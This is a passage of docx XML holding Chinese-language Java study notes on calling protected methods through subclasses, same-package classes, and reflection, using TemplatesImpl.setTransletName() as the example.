          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E895F7" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ACE071D" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF3A9F8" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除了所在类内部调用之外的方法，可以被可以访问到的其他方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACC5F0A" w14:textId="0C176D84" w:rsidR="00AD0F93" w:rsidRDefault="008F7302" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>子类调用法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D66FB91" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>子类中调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CDCA1C" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BCF653F" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00653B72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在子类中，可以直接调用父类的</w:t>
      </w:r>
      <w:r w:rsidRPr="00653B72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
      <w:r w:rsidRPr="00653B72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法。子类继承了父类的</w:t>
      </w:r>
      <w:r w:rsidRPr="00653B72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
      <w:r w:rsidRPr="00653B72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，因此可以通过子类对象来访问和调用该方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6BE9E4" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF8BF06" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class ParentClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC511EF" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    protected void protectedMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4DE5F9" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637C6DBA" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378A6478" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533D18A6" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E775F6" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class ChildClass extends ParentClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA56084" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public void someMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36749559" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        protectedMethod(); // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以在子类中直接调用父类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> protected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319258AA" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566049B9" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F9217D" w14:textId="50C08ECA" w:rsidR="00AD0F93" w:rsidRDefault="008F7302" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同包其他类调用法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8685BC" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同包中其他类调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C56884" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55478D62" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0006045C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在同一个包中的其他类中，可以直接访问和调用类的</w:t>
      </w:r>
      <w:r w:rsidRPr="0006045C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
      <w:r w:rsidRPr="0006045C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法。由于在同一包中，因此可以访问类的</w:t>
      </w:r>
      <w:r w:rsidRPr="0006045C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
      <w:r w:rsidRPr="0006045C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成员。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3507C4FD" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="061CF654" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>package com.example.package1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2022B4E2" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E81F6B3" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class MyClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE21E80" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    protected void protectedMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB8D684" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110A3A68" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506F60F3" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE73AD1" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C85D62" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>package com.example.package1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B3634D" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49F54DA0" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class OtherClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AFC5FE" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public void someMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4B9D6F" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        MyClass myObject = new MyClass();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE35DFA" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        myObject.protectedMethod(); // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以在同一包中的其他类中直接调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> protected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C991191" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4743C809" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5DCB87" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F55ADBE" w14:textId="56641669" w:rsidR="00AD0F93" w:rsidRDefault="00D76DEB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F73899" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D792DD" w14:textId="77777777" w:rsidR="00792E2A" w:rsidRDefault="00792E2A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问修饰符表示受保护的访问级别。它允许子类和同一包中的其他类访问该类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成员（字段、方法或构造函数），但不允许其他包中的类直接访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2A0BDD" w14:textId="77777777" w:rsidR="00792E2A" w:rsidRDefault="00792E2A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E16067C" w14:textId="77777777" w:rsidR="00792E2A" w:rsidRDefault="00792E2A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在你的代码中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TemplatesImpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setTransletName()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法被声明为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这意味着只能在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TemplatesImpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的子类中或者相同包中的其他类中访问该方法。无法从包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TemplatesImpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例的类中直接调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setTransletName()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，因为它的访问权限受到限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E039DCA" w14:textId="77777777" w:rsidR="00792E2A" w:rsidRDefault="00792E2A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC90096" w14:textId="77777777" w:rsidR="00792E2A" w:rsidRDefault="00792E2A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你想调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setTransletName()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，有两个解决办法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292848CB" w14:textId="1B70ACC7" w:rsidR="00792E2A" w:rsidRDefault="00F75D7E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继承法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097D6678" w14:textId="77777777" w:rsidR="00792E2A" w:rsidRDefault="00792E2A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继承</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TemplatesImpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类：创建一个新的类，继承自</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TemplatesImpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并在该子类中调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setTransletName()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法。这样，你就可以在子类中使用该方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD0D174" w14:textId="49B8E76F" w:rsidR="00792E2A" w:rsidRDefault="00F75D7E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反射法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28000A09" w14:textId="77777777" w:rsidR="00792E2A" w:rsidRDefault="00792E2A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用反射：使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的反射机制，可以绕过访问权限，访问受保护或私有的成员。通过反射，你可以调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setTransletName()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，即使它是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的。以下是使用反射调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setTransletName()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法的示例代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F5BCC2" w14:textId="77777777" w:rsidR="00792E2A" w:rsidRDefault="00792E2A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C574D4C" w14:textId="3084A8FF" w:rsidR="00792E2A" w:rsidRDefault="00792E2A" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7E9E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>TemplatesImpl obj = new TemplatesImpl();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D7D7F4" w14:textId="161AF712" w:rsidR="00F64F66" w:rsidRPr="006B7E9E" w:rsidRDefault="00F64F66" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>通过传入</w:t>
      </w:r>
      <w:r w:rsidR="002D7350">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidR="002D7350">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类型的</w:t>
      </w:r>
      <w:r w:rsidR="002D7350">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D7350">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">setTransletName </w:t>
      </w:r>
      <w:r w:rsidR="002D7350">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的方法名字，完成反射的调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3D28F6" w14:textId="77777777" w:rsidR="00792E2A" w:rsidRPr="006B7E9E" w:rsidRDefault="00792E2A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7E9E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    Method setTransletNameMethod = TemplatesImpl.class.getDeclaredMethod("setTransletName", String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615942BA" w14:textId="77777777" w:rsidR="00792E2A" w:rsidRPr="006B7E9E" w:rsidRDefault="00792E2A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7E9E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    setTransletNameMethod.setAccessible(true);</w:t>
      </w:r>
    </w:p>
